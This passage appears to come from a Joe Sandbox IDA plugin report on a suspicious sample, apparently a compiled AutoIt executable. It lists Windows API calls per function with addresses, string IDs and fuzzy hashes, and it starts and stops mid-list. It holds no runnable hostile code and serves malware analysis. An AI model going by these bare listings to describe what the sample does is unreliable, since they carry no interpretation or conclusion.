                            • VariantInit.OLEAUT32(?), ref: 0041EF06
                            • VariantClear.OLEAUT32(00000013), ref: 0041EF78
                            • VariantClear.OLEAUT32(00000000), ref: 0041EFD3
                            • _memmove.LIBCMT ref: 0041EFFD
                            • VariantClear.OLEAUT32(?), ref: 0041F04A
                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0041F078
                            Similarity
                            • API ID: Variant$Clear$ChangeInitType_memmove
                            • String ID:
                            • API String ID: 1101466143-0
                            APIs
                            • _memset.LIBCMT ref: 00422258
                            • GetMenuItemInfoW.USER32 ref: 004222A3
                            • IsMenu.USER32(00000000), ref: 004222C3
                            • CreatePopupMenu.USER32 ref: 004222F7
                            • GetMenuItemCount.USER32(000000FF), ref: 00422355
                            • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00422386
                            Similarity
                            • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                            • String ID:
                            • API String ID: 3311875123-0
                            APIs
                              • Part of subcall function 003C2612: GetWindowLongW.USER32(?,000000EB), ref: 003C2623
                            • BeginPaint.USER32(?,?), ref: 003C179A
                            • GetWindowRect.USER32(?,?), ref: 003C17FE
                            • ScreenToClient.USER32(?,?), ref: 003C181B
                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 003C182C
                            • EndPaint.USER32(?,?), ref: 003C1876
                            Similarity
                            • API ID: PaintWindow$BeginClientLongRectScreenViewport
                            • String ID:
                            • API String ID: 1827037458-0
                            APIs
                            • ShowWindow.USER32(004857B0,00000000), ref: 0044B712
                            • EnableWindow.USER32(00000000,00000000), ref: 0044B736
                            • ShowWindow.USER32(004857B0,00000000), ref: 0044B796
                            • ShowWindow.USER32(00000000,00000004), ref: 0044B7A8
                            • EnableWindow.USER32(00000000,00000001), ref: 0044B7CC
                            • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0044B7EF
                            Similarity
                            • API ID: Window$Show$Enable$MessageSend
                            • String ID:
                            • API String ID: 642888154-0
                            APIs
                            • GetForegroundWindow.USER32 ref: 004370AC
                              • Part of subcall function 004339A0: GetWindowRect.USER32(?,?), ref: 004339B3
                            • GetDesktopWindow.USER32 ref: 004370D6
                            • GetWindowRect.USER32(00000000), ref: 004370DD
                            • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0043710F
                              • Part of subcall function 00425244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004252BC
                            • GetCursorPos.USER32(?), ref: 0043713B
                            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00437199
                            Similarity
                            • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                            • String ID:
                            • API String ID: 4137160315-0
                            APIs
                              • Part of subcall function 004180A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004180C0
                              • Part of subcall function 004180A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004180CA
                              • Part of subcall function 004180A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004180D9
                              • Part of subcall function 004180A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004180E0
                              • Part of subcall function 004180A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004180F6
                            • GetLengthSid.ADVAPI32(?,00000000,0041842F), ref: 004188CA
                            • GetProcessHeap.KERNEL32(00000008,00000000), ref: 004188D6
                            • HeapAlloc.KERNEL32(00000000), ref: 004188DD
                            • CopySid.ADVAPI32(00000000,00000000,?), ref: 004188F6
                            • GetProcessHeap.KERNEL32(00000000,00000000,0041842F), ref: 0041890A
                            • HeapFree.KERNEL32(00000000), ref: 00418911
                            Similarity
                            • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                            • String ID:
                            • API String ID: 3008561057-0
                            APIs
                            • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 004185E2
                            • OpenProcessToken.ADVAPI32(00000000), ref: 004185E9
                            • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 004185F8
                            • CloseHandle.KERNEL32(00000004), ref: 00418603
                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00418632
                            • DestroyEnvironmentBlock.USERENV(00000000), ref: 00418646
                            Similarity
                            • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                            • String ID:
                            • API String ID: 1413079979-0
                            • Opcode ID: 61a940346fa28c5c9f82c29eb8b29829c85f0ad83e87f656f93c406902f50fc4
                            • Instruction ID: 91ec06880b319b146670b56e105a6673ef6735bd5e3ac2cc541d6aa9e23b5a8b
                            • Opcode Fuzzy Hash: 61a940346fa28c5c9f82c29eb8b29829c85f0ad83e87f656f93c406902f50fc4
                            • Instruction Fuzzy Hash: 8C118976100209ABDF018FA4DD49BDF7BA9EF49344F044069FE04A2160C77A9DA5EB64
                            APIs
                            • GetDC.USER32(00000000), ref: 0041B7B5
                            • GetDeviceCaps.GDI32(00000000,00000058,?,?,80004003), ref: 0041B7C6
                            • GetDeviceCaps.GDI32(00000000,0000005A,?,?,80004003), ref: 0041B7CD
                            • ReleaseDC.USER32(00000000,00000000), ref: 0041B7D5
                            • MulDiv.KERNEL32 ref: 0041B7EC
                            • MulDiv.KERNEL32 ref: 0041B7FE
                            Similarity
                            • API ID: CapsDevice$Release
                            • String ID:
                            • API String ID: 1035833867-0
                            • Opcode ID: 30aa3f54f9d16ee37eb48bdca9b3edbb59decb6abb8a5be488832af1ce94401b
                            • Instruction ID: 72e821580d469320957efc14d130a6f539fa198623eab7e23370cd199e7e3809
                            • Opcode Fuzzy Hash: 30aa3f54f9d16ee37eb48bdca9b3edbb59decb6abb8a5be488832af1ce94401b
                            • Instruction Fuzzy Hash: 55018479E00319BBEB109BF69C45A5FBFB8EB49351F044076FA08A7291D6309C00CF94
                            APIs
                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 003E0193
                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 003E019B
                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 003E01A6
                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 003E01B1
                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 003E01B9
                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 003E01C1
                            Similarity
                            • API ID: Virtual
                            • String ID:
                            • API String ID: 4278518827-0
                            • Opcode ID: 11a7b9edc2286c3176ce0874aa18ae8c408b69dc811019d98c41835b0f31ed36
                            • Instruction ID: 7fc98adf32ff996969bae5c6e6955c88ca18fb9d7a3822e3ab7d98d67fea44c7
                            • Opcode Fuzzy Hash: 11a7b9edc2286c3176ce0874aa18ae8c408b69dc811019d98c41835b0f31ed36
                            • Instruction Fuzzy Hash: E0016CB0902B597DE3008F5A8C85B52FFA8FF19354F00411BA15C47941C7F5A868CBE5
                            APIs
                            • PostMessageW.USER32 ref: 004253F9
                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0042540F
                            • GetWindowThreadProcessId.USER32(?,?), ref: 0042541E
                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0042542D
                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00425437
                            • CloseHandle.KERNEL32(00000000), ref: 0042543E
                            Similarity
                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                            • String ID:
                            • API String ID: 839392675-0
                            • Opcode ID: 7e72ac6b5ccc5d539465b65731c6b841ab704a431033a77a072eaa9fe2f3085d
                            • Instruction ID: 72bb998f4072339852691b44f3710cc14a7b99b8ab269b6d008202eca0078363
                            • Opcode Fuzzy Hash: 7e72ac6b5ccc5d539465b65731c6b841ab704a431033a77a072eaa9fe2f3085d
                            • Instruction Fuzzy Hash: A9F01D36241558BBE7215BA29C0DEAB7A7CEBC7B11F000179FA04D10519AA51A0686B9
                            APIs
                            • InterlockedExchange.KERNEL32(?,?,?,?,?,00405D3D,?,?,?,?,003D0EE4,?,?), ref: 00427243
                            • EnterCriticalSection.KERNEL32(?,?,003D0EE4,?,?), ref: 00427254
                            • TerminateThread.KERNEL32(00000000,000001F6,?,003D0EE4,?,?), ref: 00427261
                            • WaitForSingleObject.KERNEL32(00000000,000003E8,?,003D0EE4,?,?), ref: 0042726E
                              • Part of subcall function 00426C35: CloseHandle.KERNEL32(00000000), ref: 00426C3F
                            • InterlockedExchange.KERNEL32(?,000001F6,?,003D0EE4,?,?), ref: 00427281
                            • LeaveCriticalSection.KERNEL32(?,?,003D0EE4,?,?), ref: 00427288
                            Similarity
                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                            • String ID:
                            • API String ID: 3495660284-0
                            • Opcode ID: 48aea202f510485a212cdc381f60b24cbdfb1085528b47b08c8bc5e4d92dcab1
                            • Instruction ID: b876d6822db8bd400bb4fdbc482ca884049e237ed8ac971e6d0225db2710bc17
                            • Opcode Fuzzy Hash: 48aea202f510485a212cdc381f60b24cbdfb1085528b47b08c8bc5e4d92dcab1
                            • Instruction Fuzzy Hash: 03F0823E540A12EBE7112B64FD4C9DB7779FF46702B5005B2F503910A0CBBB5815CB68
                            APIs
                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041899D
                            • UnloadUserProfile.USERENV(?,?), ref: 004189A9
                            • CloseHandle.KERNEL32(?), ref: 004189B2
                            • CloseHandle.KERNEL32(?), ref: 004189BA
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 004189C3
                            • HeapFree.KERNEL32(00000000), ref: 004189CA
                            Similarity
                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                            • String ID:
                            • API String ID: 146765662-0
                            • Opcode ID: 180f1d3d97952489b2a460c2afcb65e722a0986b32613118e38ea533ae461374
                            • Instruction ID: 31a27faa56cc57cec5e58d63ca4e9026a37862f61046b8bcedf47ae97ad442b4
                            • Opcode Fuzzy Hash: 180f1d3d97952489b2a460c2afcb65e722a0986b32613118e38ea533ae461374
                            • Instruction Fuzzy Hash: 97E0757A104505FBDB011FE5EC0C95ABFB9FF8A762B508631F619C1470CB32A869DB58
                            APIs
                            • ProgIDFromCLSID.OLE32(?,00000000), ref: 004176EA
                            • CoTaskMemFree.OLE32(00000000), ref: 00417702
                            • CLSIDFromProgID.OLE32(?,?), ref: 00417727
                            • _memcmp.LIBCMT ref: 00417748
                            Strings
                            Similarity
                            • API ID: FromProg$FreeTask_memcmp
                            • String ID: ,,E
                            • API String ID: 314563124-4052858919
                            • Opcode ID: 0ca774a4f2715149790df1d5dd988db9b80ded9420fba37d073eda5fb7d18060
                            • Instruction ID: 250ea1d41728423e6fc643b81aa09b75dd42e1e2fbd1101657d620f84de7dcbf
                            • Opcode Fuzzy Hash: 0ca774a4f2715149790df1d5dd988db9b80ded9420fba37d073eda5fb7d18060
                            • Instruction Fuzzy Hash: 33814B75A00109EFCB00DFA4C984EEEB7B9FF89315F204559E506EB250DB75AE46CB60
                            APIs
                            • VariantInit.OLEAUT32(?), ref: 00438613
                            • CharUpperBuffW.USER32(?,?), ref: 00438722
                            • VariantClear.OLEAUT32(?), ref: 0043889A
                              • Part of subcall function 00427562: VariantInit.OLEAUT32(00000000), ref: 004275A2
                              • Part of subcall function 00427562: VariantCopy.OLEAUT32(00000000,?), ref: 004275AB
                              • Part of subcall function 00427562: VariantClear.OLEAUT32(00000000), ref: 004275B7
                            Strings
                            Similarity
                            • API ID: Variant$ClearInit$BuffCharCopyUpper
                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                            • API String ID: 4237274167-1221869570
                            • Opcode ID: da1a0c6c21f7dbc764961e0cc68fa5ec6556104a44b75a4759fa2071f798daa4
                            • Instruction ID: 03162252e441908592f6fd50106e23092a5bb417a100f9d9f9f9a55ad730b6bd
                            • Opcode Fuzzy Hash: da1a0c6c21f7dbc764961e0cc68fa5ec6556104a44b75a4759fa2071f798daa4
                            • Instruction Fuzzy Hash: F0917A716043019FCB14EF24C485A5AB7E4EF89714F14896EF88ACB361DB34ED46CB56
                            APIs
                              • Part of subcall function 003DFC86: _wcscpy.LIBCMT ref: 003DFCA9
                            • _memset.LIBCMT ref: 00422B87
                            • GetMenuItemInfoW.USER32 ref: 00422BB6
                            • SetMenuItemInfoW.USER32 ref: 00422C69
                            • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00422C97
                            Strings
                            Similarity
                            • API ID: ItemMenu$Info$Default_memset_wcscpy
                            • String ID: 0
                            • API String ID: 4152858687-4108050209
                            • Opcode ID: 3d65054dca5bce5a48e37c0483028bd3d73bbeea6cfcde4245d703562d749d29
                            • Instruction ID: b645ef0370d80956eee2ad55a0252408de9e1a9d743e4a0ebf4400ae6881629f
                            • Opcode Fuzzy Hash: 3d65054dca5bce5a48e37c0483028bd3d73bbeea6cfcde4245d703562d749d29
                            • Instruction Fuzzy Hash: 3451E471708321AAD725AF25E94566F7BE4AF45310F440A2FF880D72D0DBB8DC44875A
                            APIs
                            Strings
                            Similarity
                            • API ID: _memmove$_free
                            • String ID: 3c=$_=
                            • API String ID: 2620147621-3170935384
                            • Opcode ID: 93e9e6f8e52fa90a42b79b1d268eb00935b3c2ef3896f5b2b9984dd8a42c8d53
                            • Instruction ID: a5e2b38f2f4ac553798301a6371d1939e2fe7d087f8ef7dfef1c580ec172e6dc
                            • Opcode Fuzzy Hash: 93e9e6f8e52fa90a42b79b1d268eb00935b3c2ef3896f5b2b9984dd8a42c8d53
                            • Instruction Fuzzy Hash: 525168766083418FDB26CF29D840A6BBBF5AF85300F45492EE98997390DB35ED01CB83
                            APIs
                            Strings
                            Similarity
                            • API ID: _memset$_memmove
                            • String ID: 3c=$ERCP
                            • API String ID: 2532777613-727080923
                            • Opcode ID: 5904ed1886c22a20645ae354f14d870429805bac6d33499487d7ebc5f260691c
                            • Instruction ID: 1af78157e453fc1ee631844c7826ec1b8ffc7324e2fc602ee5d97cae7e69c453
                            • Opcode Fuzzy Hash: 5904ed1886c22a20645ae354f14d870429805bac6d33499487d7ebc5f260691c
                            • Instruction Fuzzy Hash: 39519E71900705DBDB25CF65D882BABB7F8AF44304F20896FE45ACB290E774AA84CB44
                            APIs
                            • GetWindowRect.USER32(00E35190,?), ref: 00449863
                            • ScreenToClient.USER32(00000002,00000002), ref: 00449896
                            • MoveWindow.USER32(?,?,?,?,000000FF,00000001), ref: 00449903
                            Strings
                            Similarity
                            • API ID: Window$ClientMoveRectScreen
                            • String ID: `$
                            • API String ID: 3880355969-74666722
                            • Opcode ID: cc84969a38716b56f038dcdc97e4f13feb6299447a3d5c8e4e8cba412b2045b9
                            • Instruction ID: 890d8d8535bb67d41f3ff6eab043cad0a13d526c79c2fd0f4ec88705323fa803
                            • Opcode Fuzzy Hash: cc84969a38716b56f038dcdc97e4f13feb6299447a3d5c8e4e8cba412b2045b9
                            • Instruction Fuzzy Hash: 19514A74A00208EFDB14DF68C880AAF7BB5FB46360F14856EF8559B3A0D734AD51DB94
                            APIs
                            Strings
                            Similarity
                            • API ID: Menu$Delete$InfoItem_memset
                            • String ID: 0
                            • API String ID: 1173514356-4108050209
                            • Opcode ID: 95bc7ea2e80bdbf61615858979bbbef420cddf049205388542e27ee340e14616
                            • Instruction ID: 95f41621cfd8066f9170c3733f3e4d2c8983434d0f5465625ff4a78ea74a7904
                            • Opcode Fuzzy Hash: 95bc7ea2e80bdbf61615858979bbbef420cddf049205388542e27ee340e14616
                            • Instruction Fuzzy Hash: AB41F070204321AFD720EF25E944B6BBBE8EF85314F044A2EF86597391D7B4E904CB5A
                            APIs
                            • InvalidateRect.USER32(?,00000000,00000001), ref: 004488DE
                            Strings
                            Similarity
                            • API ID: InvalidateRect
                            • String ID: `$
                            • API String ID: 634782764-74666722
                            • Opcode ID: e804d34591957cea5e9ef7e9a7682457e47981792eee59da04b003d426aba4c0
                            • Instruction ID: c1199b097912527036c3eb59e072fce424b62106a513c74a633dd02f41b01d27
                            • Opcode Fuzzy Hash: e804d34591957cea5e9ef7e9a7682457e47981792eee59da04b003d426aba4c0
                            • Instruction Fuzzy Hash: FE31E374600908BFFB20AB18CC45BBE77A0FB06310F54442BF911E62A1CE38E9409B5F
                            APIs
                            • ClientToScreen.USER32(?,?), ref: 0044AB60
                            • GetWindowRect.USER32(?,?), ref: 0044ABD6
                            • PtInRect.USER32(?,?,0044C014), ref: 0044ABE6
                            • MessageBeep.USER32(00000000,?,?,?,?,0044C014,?,?,?), ref: 0044AC57
                            Strings
                            Similarity
                            • API ID: Rect$BeepClientMessageScreenWindow
                            • String ID: `$
                            • API String ID: 1352109105-74666722
                            • Opcode ID: 4e41e13a2a97ddc0673e15ff4a92c6da8165feb64c993be813158690a5e9ddce
                            • Instruction ID: 1a8a4e7779281933482fafb7f4c37ae71f28b265bc4dd3816f771fc8689bc286
                            • Opcode Fuzzy Hash: 4e41e13a2a97ddc0673e15ff4a92c6da8165feb64c993be813158690a5e9ddce
                            • Instruction Fuzzy Hash: 3B419F35A40118DFEB11DF58D8C4A5ABBF5FB49304F1884BAE9149F360C734E861CB9A
                            APIs
                            • CharLowerBuffW.USER32(?,?), ref: 0043D7C5
                              • Part of subcall function 003C784B: _memmove.LIBCMT ref: 003C7899
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: BuffCharLower_memmove
                            • String ID: cdecl$none$stdcall$winapi
                            • API String ID: 3425801089-567219261
                            • Opcode ID: ae03c6bb1d466feb8260cdf9231a50f3eb61c2aeea25780d2aff2720c48c25cd
                            • Instruction ID: 47e07ef24e363a44a02c6c45e07dfb77271b07a159576e83bcc54a88636bd978
                            • Opcode Fuzzy Hash: ae03c6bb1d466feb8260cdf9231a50f3eb61c2aeea25780d2aff2720c48c25cd
                            • Instruction Fuzzy Hash: 8F31AE71904219ABDF05EF64CC519EEB3B5FF08320F108A6AE8399B2D1DB75AD45CB84
                            APIs
                              • Part of subcall function 003C7DE1: _memmove.LIBCMT ref: 003C7E22
                              • Part of subcall function 0041AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0041AABC
                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00418F14
                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00418F27
                            • SendMessageW.USER32(?,00000189,?,00000000), ref: 00418F57
                              • Part of subcall function 003C7BCC: _memmove.LIBCMT ref: 003C7C06
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: MessageSend$_memmove$ClassName
                            • String ID: ComboBox$ListBox
                            • API String ID: 365058703-1403004172
                            • Opcode ID: 2acdf9237cf7720a0ba9712107f3756cfdf826a1c96dd64fb9e6eeb0a1163206
                            • Instruction ID: 4f7af09475ff8a533f6ee1fe6c2d822563c3a49fb1e685436ef7111c31d3690a
                            • Opcode Fuzzy Hash: 2acdf9237cf7720a0ba9712107f3756cfdf826a1c96dd64fb9e6eeb0a1163206
                            • Instruction Fuzzy Hash: 3A210471A01108BADB15ABB0CC85EFFB769DF46360F14412EF8259B2E0DF391C8A9A14
                            APIs
                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0043184C
                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00431872
                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 004318A2
                            • InternetCloseHandle.WININET(00000000), ref: 004318E9
                              • Part of subcall function 00432483: GetLastError.KERNEL32(?,?,00431817,00000000,00000000,00000001), ref: 00432498
                              • Part of subcall function 00432483: SetEvent.KERNEL32(?,?,00431817,00000000,00000000,00000001), ref: 004324AD
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                            • String ID:
                            • API String ID: 3113390036-3916222277
                            • Opcode ID: 8b72e945935db97206527384d11a8f47e5370c15db3c1674eadfe29d5a92a3b6
                            • Instruction ID: b6a7ab0cde5b6d27f849e4c82c0e6ddf7dc61b2de6a74803b0a8f8026dff0530
                            • Opcode Fuzzy Hash: 8b72e945935db97206527384d11a8f47e5370c15db3c1674eadfe29d5a92a3b6
                            • Instruction Fuzzy Hash: FA21DEB1500208BFEB11AB61CC84EBB77ECEB4D748F10512BF805A2290EA688D0597B9
                            APIs
                              • Part of subcall function 003C2612: GetWindowLongW.USER32(?,000000EB), ref: 003C2623
                            • GetCursorPos.USER32(?), ref: 0044C4D2
                            • TrackPopupMenuEx.USER32 ref: 0044C4E7
                            • GetCursorPos.USER32(?), ref: 0044C534
                            • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,003FB9AB,?,?,?), ref: 0044C56E
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Cursor$LongMenuPopupProcTrackWindow
                            • String ID: `$
                            • API String ID: 2864067406-74666722
                            • Opcode ID: db4ffb76d74f5d94472d3c4f54ae93e2328679f811188385297583504aad70aa
                            • Instruction ID: 840eb5b31684a0659efb7b98f1caac359bb8da3e8a9a2ff0a551f239d7b6c3df
                            • Opcode Fuzzy Hash: db4ffb76d74f5d94472d3c4f54ae93e2328679f811188385297583504aad70aa
                            • Instruction Fuzzy Hash: F2319135601028FFDB559F58C898EAF7BB5EB09350F48406AF9058B361C735AD60DBA8
                            APIs
                              • Part of subcall function 003C1D35: CreateWindowExW.USER32 ref: 003C1D73
                              • Part of subcall function 003C1D35: GetStockObject.GDI32(00000011), ref: 003C1D87
                              • Part of subcall function 003C1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 003C1D91
                            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00446461
                            • LoadLibraryW.KERNEL32(?), ref: 00446468
                            • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0044647D
                            • DestroyWindow.USER32 ref: 00446485
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                            • String ID: SysAnimate32
                            • API String ID: 4146253029-1011021900
                            • Opcode ID: 0b2213e8c8aeee5a0e0d06ac7f96e02614028cec79d5e47b02240b67f6b0ee55
                            • Instruction ID: 603c58953c0f0ddc474fa25f89a1f06dae1be6b14d4fa9736ca365cbefc9cae9
                            • Opcode Fuzzy Hash: 0b2213e8c8aeee5a0e0d06ac7f96e02614028cec79d5e47b02240b67f6b0ee55
                            • Instruction Fuzzy Hash: 6021CF71100205BFFF108FA4DC40EBB77ACEB4A368F12462AF91492290C739DC41976A
                            APIs
                            • GetStdHandle.KERNEL32(0000000C), ref: 00426DBC
                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00426DEF
                            • GetStdHandle.KERNEL32(0000000C), ref: 00426E01
                            • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00426E3B
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: CreateHandle$FilePipe
                            • String ID: nul
                            • API String ID: 4209266947-2873401336
                            • Opcode ID: 693a045b89bbe414361596ee7bd163a5c6a7a076b77b3d182642d88bea00e82b
                            • Instruction ID: d412ffa8e06d156203568b70128ef9d517b2ee47e00b8f46c794a8ee1b45be59
                            • Opcode Fuzzy Hash: 693a045b89bbe414361596ee7bd163a5c6a7a076b77b3d182642d88bea00e82b
                            • Instruction Fuzzy Hash: 9821B275700229ABDB209F29EC04A9A77F4FF45720F614A2AFCA0D73D0DB7498158B58
                            APIs
                            • GetStdHandle.KERNEL32(000000F6), ref: 00426E89
                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00426EBB
                            • GetStdHandle.KERNEL32(000000F6), ref: 00426ECC
                            • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00426F06
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: CreateHandle$FilePipe
                            • String ID: nul
                            • API String ID: 4209266947-2873401336
                            • Opcode ID: 6e452e7a3152b6ecfeafe01093108a678b49520abc005e121f9d0fa0ef3154b6
                            • Instruction ID: 31b7bf1cfa2ddf0ac191f648132f4b7d3486b67dc01b6d30903ecbf719581a53
                            • Opcode Fuzzy Hash: 6e452e7a3152b6ecfeafe01093108a678b49520abc005e121f9d0fa0ef3154b6
                            • Instruction Fuzzy Hash: 8D21B0797003259BDB209F69EC04A9B77A8EF45730F620A2AFCA0D33D0D774A851CB59
                            APIs
                            • SetErrorMode.KERNEL32(00000001), ref: 0042AC54
                            • GetVolumeInformationW.KERNEL32 ref: 0042ACA8
